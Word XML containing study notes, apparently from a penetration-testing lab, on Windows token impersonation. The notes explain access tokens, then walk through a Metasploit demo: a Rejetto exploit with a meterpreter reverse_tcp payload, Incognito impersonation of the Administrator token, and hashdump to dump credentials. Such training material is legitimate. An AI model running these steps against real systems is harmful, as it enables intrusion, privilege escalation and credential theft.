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DE6B9" w14:textId="124DE89D" w:rsidR="00A12C82" w:rsidRPr="00B868FA" w:rsidRDefault="00A12C82">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B868FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Privilege Escalation Token Impersonation with Incognito:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CEA2F5" w14:textId="77777777" w:rsidR="00265DE4" w:rsidRDefault="00265DE4"/>
    <w:p w14:paraId="357BAD97" w14:textId="7AC6611F" w:rsidR="0065473B" w:rsidRDefault="0065473B">
      <w:r w:rsidRPr="0065473B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Window access tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are core element of authentication process on windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB267E8" w14:textId="00BF13A8" w:rsidR="0065473B" w:rsidRDefault="0065473B">
      <w:r>
        <w:t>Created and managed by local security authority subsystem services(lsass).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C88A92" w14:textId="77777777" w:rsidR="0065473B" w:rsidRDefault="0065473B"/>
    <w:p w14:paraId="4AF44F13" w14:textId="47D986CE" w:rsidR="0065473B" w:rsidRDefault="0065473B">
      <w:r w:rsidRPr="0065473B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>access tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>provide users with access to system and network resource without providing each time credential, a process is started, or system resource is access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD50C78" w14:textId="4F0310EA" w:rsidR="0065473B" w:rsidRPr="0065473B" w:rsidRDefault="0065473B" w:rsidP="0065473B">
      <w:r>
        <w:t xml:space="preserve">After authentication the </w:t>
      </w:r>
      <w:r w:rsidRPr="0065473B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>access tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C333B3">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> generated by </w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>winlogon.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> every time user </w:t>
      </w:r>
      <w:r w:rsidR="00B868FA">
        <w:t>authenticates</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E982E" w14:textId="77777777" w:rsidR="0065473B" w:rsidRPr="0065473B" w:rsidRDefault="0065473B"/>
    <w:p w14:paraId="49128A4D" w14:textId="19C83AF7" w:rsidR="0065473B" w:rsidRDefault="0065473B">
      <w:r w:rsidRPr="0065473B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>access tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>contain user accounts and privs related to that account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB1E143" w14:textId="4A10F62C" w:rsidR="0065473B" w:rsidRDefault="00B868FA">
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="0065473B">
        <w:t xml:space="preserve"> token is attached to the </w:t>
      </w:r>
      <w:r w:rsidR="0065473B" w:rsidRPr="00B868FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>userinit.exe</w:t>
      </w:r>
      <w:r w:rsidR="0065473B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>process, after</w:t>
      </w:r>
      <w:r w:rsidR="00E105D5">
        <w:t xml:space="preserve"> which all process started by the user </w:t>
      </w:r>
      <w:r>
        <w:t>inherits</w:t>
      </w:r>
      <w:r w:rsidR="00E105D5">
        <w:t xml:space="preserve"> the copy of the access </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">token and </w:t>
      </w:r>
      <w:r w:rsidR="00C333B3">
        <w:t>runs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> under same privs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10298B27" w14:textId="77777777" w:rsidR="00B868FA" w:rsidRDefault="00B868FA"/>
    <w:p w14:paraId="443774E1" w14:textId="77777777" w:rsidR="00B868FA" w:rsidRPr="00B868FA" w:rsidRDefault="00B868FA" w:rsidP="00B868FA">
      <w:r w:rsidRPr="00B868FA">
        <w:t>The process works like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8BB248" w14:textId="77777777" w:rsidR="00B868FA" w:rsidRPr="00B868FA" w:rsidRDefault="00B868FA" w:rsidP="00B868FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B868FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogon.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:t xml:space="preserve"> handles the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>interactive logon</w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:t xml:space="preserve"> (user login via GUI or RDP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70434620" w14:textId="77777777" w:rsidR="00B868FA" w:rsidRPr="00B868FA" w:rsidRDefault="00B868FA" w:rsidP="00B868FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B868FA">
        <w:t xml:space="preserve">It passes the user’s credentials to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LSASS.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:t>, which verifies them (using SAM, Active Directory, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE62EE3" w14:textId="77777777" w:rsidR="00B868FA" w:rsidRPr="00B868FA" w:rsidRDefault="00B868FA" w:rsidP="00B868FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B868FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LSASS.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:t xml:space="preserve"> then </w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>creates an access token</w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:t xml:space="preserve"> that represents the user’s security context (user SID, group memberships, privileges, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA19EA5" w14:textId="77777777" w:rsidR="00B868FA" w:rsidRPr="00B868FA" w:rsidRDefault="00B868FA" w:rsidP="00B868FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B868FA">
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>access token</w:t>
      </w:r>
      <w:r w:rsidRPr="00B868FA">
        <w:t xml:space="preserve"> is attached to the user’s processes (like explorer.exe) to determine what they can access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4315A511" w14:textId="77777777" w:rsidR="00B868FA" w:rsidRDefault="00B868FA"/>
    <w:p w14:paraId="7D47997F" w14:textId="3B66C870" w:rsidR="003A0F60" w:rsidRDefault="003A0F60">
      <w:r>
        <w:t>Window access token categorized based on security level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5552E516" w14:textId="57C276C0" w:rsidR="00D00E3D" w:rsidRPr="00D00E3D" w:rsidRDefault="00D00E3D" w:rsidP="00D00E3D">
      <w:r w:rsidRPr="00D00E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impersonate-level token → Non-interactive login:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:br/>
        <w:t xml:space="preserve">Used when a service or process acts </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>on behalf of a user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:t xml:space="preserve"> (e.g., network or remote call).</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:br/>
        <w:t xml:space="preserve">It can </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>access local resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:t xml:space="preserve"> as that user, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not other systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B6E95" w14:textId="3DE9B72C" w:rsidR="00D00E3D" w:rsidRPr="00D00E3D" w:rsidRDefault="00D00E3D" w:rsidP="00D00E3D">
      <w:r w:rsidRPr="00D00E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Delegate-level token → Interactive login:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:br/>
        <w:t xml:space="preserve">Created when a user </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>logs in directly</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:t xml:space="preserve"> (e.g., at console or RDP).</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:br/>
        <w:t xml:space="preserve">It can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>used on other systems too</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:t xml:space="preserve"> — full rights for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>delegation across network</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00E3D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B7C82D" w14:textId="77777777" w:rsidR="003A0F60" w:rsidRDefault="003A0F6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6"/>
        <w:gridCol w:w="1714"/>
        <w:gridCol w:w="4850"/>
      </w:tblGrid>
      <w:tr w:rsidR="00576333" w:rsidRPr="00576333" w14:paraId="76FE19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5B578" w14:textId="77777777" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00576333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235FBE13" w14:textId="77777777" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Type of Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0B9920" w14:textId="77777777" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576333" w:rsidRPr="00576333" w14:paraId="37B9A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C5232" w14:textId="77777777" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>When you log on (locally or via RDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="128A11D2" w14:textId="77777777" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Delegate-level token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55DA6DF8" w14:textId="77777777" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
            <w:r w:rsidRPr="00576333">
              <w:t xml:space="preserve">Created by </w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>LSASS</w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:t xml:space="preserve"> for your interactive session. It allows </w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>full access</w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:t xml:space="preserve">, including using your credentials to access </w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>remote systems</w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:t xml:space="preserve"> (delegation).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576333" w:rsidRPr="00576333" w14:paraId="53F40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001D2" w14:textId="77777777" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">When another process or service accesses something </w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>on your behalf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17B2C0D0" w14:textId="77777777" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impersonate-level token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F9BB824" w14:textId="77777777" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
            <w:r w:rsidRPr="00576333">
              <w:t xml:space="preserve">Temporarily created so that process can act </w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>as you</w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:t xml:space="preserve">, but </w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>only locally</w:t>
            </w:r>
            <w:r w:rsidRPr="00576333">
              <w:t xml:space="preserve"> (cannot access network resources).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D5377E5" w14:textId="77777777" w:rsidR="003A0F60" w:rsidRPr="0065473B" w:rsidRDefault="003A0F60"/>
    <w:p w14:paraId="6477FE33" w14:textId="3DFE098B" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
      <w:r w:rsidRPr="00576333">
        <w:t xml:space="preserve"> When a user </w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>logs on</w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:t xml:space="preserve">, Windows (via </w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LSASS</w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:t xml:space="preserve">) creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>delegate-level token</w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:t xml:space="preserve"> for that user.</w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:br/>
        <w:t>This token is attached to their main processes (like explorer.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FD632" w14:textId="6852043F" w:rsidR="00576333" w:rsidRPr="00576333" w:rsidRDefault="00576333" w:rsidP="00576333">
      <w:r w:rsidRPr="00576333">
        <w:t xml:space="preserve"> If one of those user processes (which has the </w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>delegate token</w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:t xml:space="preserve">) starts another process or service that needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>act on the user’s behalf</w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:br/>
        <w:t xml:space="preserve">Windows creates an </w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impersonation-level token</w:t>
      </w:r>
      <w:r w:rsidRPr="00576333">
        <w:t xml:space="preserve"> for that child or service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA10CAB" w14:textId="77777777" w:rsidR="00A12C82" w:rsidRDefault="00A12C82"/>
    <w:p w14:paraId="347C8163" w14:textId="77777777" w:rsidR="00576333" w:rsidRDefault="00576333"/>
    <w:p w14:paraId="6F3E377F" w14:textId="3704A304" w:rsidR="00576333" w:rsidRDefault="005873D0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47EEB096" wp14:editId="78795E01">
            <wp:extent cx="5796501" cy="2373704"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="201147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473678" name="Picture 20114736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7153" cy="238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CD465" w14:textId="300AF191" w:rsidR="005873D0" w:rsidRDefault="005873D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005873D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important is Seimpersonate privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176D1662" w14:textId="7489ABCF" w:rsidR="005873D0" w:rsidRPr="005873D0" w:rsidRDefault="005873D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005873D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Incognito module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52060D8E" w14:textId="77777777" w:rsidR="005873D0" w:rsidRDefault="005873D0">
      <w:r>
        <w:t>Allow to impersonate user token after exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B4BC6C" w14:textId="319518DF" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Display a list of available tokens that we can impersonate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A09225B" w14:textId="17E91AC5" w:rsidR="005873D0" w:rsidRDefault="005873D0">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F8B019" w14:textId="7172892D" w:rsidR="00917844" w:rsidRPr="00917844" w:rsidRDefault="00917844">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917844">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38388E1C" w14:textId="3F9A42DD" w:rsidR="00917844" w:rsidRDefault="00917844"/>
    <w:p w14:paraId="42B29AA1" w14:textId="459DCBA3" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A12B95A" w14:textId="5F3C1763" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C1DAF" w14:textId="031F7734" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Workspace -a impersonate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65131893" w14:textId="3B92C9E9" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE617E" w14:textId="4F7FC385" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Setg RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E34DBBE" w14:textId="37D43869" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Db_nmap -sV target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A31D6" w14:textId="77777777" w:rsidR="00917844" w:rsidRDefault="00917844"/>
    <w:p w14:paraId="3C0DFBEC" w14:textId="2984EEAA" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Search rejetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7745E673" w14:textId="0B1CFB03" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Use(index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470D884E" w14:textId="15BDA8C5" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B4BAC" w14:textId="4F606033" w:rsidR="00917844" w:rsidRDefault="00917844">
      <w:r>
        <w:t>Set payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19108830" w14:textId="6C7F802B" w:rsidR="00917844" w:rsidRDefault="003A4E6E">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B37E35" w14:textId="36F385A4" w:rsidR="003A4E6E" w:rsidRDefault="003A4E6E">
      <w:r>
        <w:t># get the meterpreter session on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA79F3" w14:textId="77777777" w:rsidR="003A4E6E" w:rsidRDefault="003A4E6E"/>
    <w:p w14:paraId="5967C1E6" w14:textId="32F55747" w:rsidR="003A4E6E" w:rsidRDefault="003A4E6E">
      <w:r>
        <w:t>#Perform local enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1B8607" w14:textId="3BA4E93C" w:rsidR="003A4E6E" w:rsidRDefault="003A4E6E">
      <w:r>
        <w:t xml:space="preserve">Sysinfo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E67446" w14:textId="7449B5AC" w:rsidR="003A4E6E" w:rsidRDefault="003A4E6E">
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB0C5A" w14:textId="737E0E8E" w:rsidR="003A4E6E" w:rsidRDefault="009C0498">
      <w:r>
        <w:t>Getprivs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1383A638" w14:textId="77777777" w:rsidR="009C0498" w:rsidRDefault="009C0498"/>
    <w:p w14:paraId="48FF4744" w14:textId="1BA2E919" w:rsidR="001D122D" w:rsidRDefault="001D122D">
      <w:r>
        <w:t xml:space="preserve">Hashdump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B88F4C" w14:textId="227F2607" w:rsidR="001D122D" w:rsidRDefault="001D122D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># it doesnot shoe any output because we donot have privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4785A3A0" w14:textId="77777777" w:rsidR="006E34D5" w:rsidRDefault="006E34D5"/>
    <w:p w14:paraId="4B3DC728" w14:textId="1AD0637E" w:rsidR="001D122D" w:rsidRDefault="001D122D">
      <w:r>
        <w:t>Cd administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CACC35B" w14:textId="77777777" w:rsidR="001D122D" w:rsidRDefault="001D122D" w:rsidP="001D122D">
      <w:r>
        <w:t># it doesnot shoe any output because we donot have privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8611DA" w14:textId="77777777" w:rsidR="001D122D" w:rsidRDefault="001D122D"/>
    <w:p w14:paraId="11B2E1AD" w14:textId="5FDD732E" w:rsidR="001D122D" w:rsidRPr="001D122D" w:rsidRDefault="001D122D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D122D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33850AF7" w14:textId="4D9896A2" w:rsidR="001D122D" w:rsidRDefault="001D122D">
      <w:r>
        <w:t>Load incognito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917D0A6" w14:textId="46B7D534" w:rsidR="001D122D" w:rsidRDefault="001D122D">
      <w:r>
        <w:t>List_tokens -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3875DB" w14:textId="6F3C8834" w:rsidR="001D122D" w:rsidRDefault="001D122D">
      <w:r>
        <w:t># with help of incognito we list user access token available on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B40595A" w14:textId="77777777" w:rsidR="001D122D" w:rsidRDefault="001D122D"/>
    <w:p w14:paraId="4F387C63" w14:textId="7CE3078A" w:rsidR="009B14CF" w:rsidRDefault="009B14CF">
      <w:r>
        <w:t>Impersonate_token “ATTACKDEFENSE/Administrator”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34207A30" w14:textId="181C79A4" w:rsidR="009B14CF" w:rsidRDefault="009B14CF">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="009B14CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>name of token(delegate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) that you want to impersonate </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66335364" w14:textId="22BAC9FD" w:rsidR="001D122D" w:rsidRDefault="009B14CF">
      <w:r>
        <w:t># we now elevated our privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2665AD43" w14:textId="77777777" w:rsidR="009B14CF" w:rsidRDefault="009B14CF"/>
    <w:p w14:paraId="1ED38187" w14:textId="7A5BF9CF" w:rsidR="009B14CF" w:rsidRDefault="009B14CF">
      <w:r>
        <w:t>Hasdump</w:t>
      </w:r>
    </w:p>
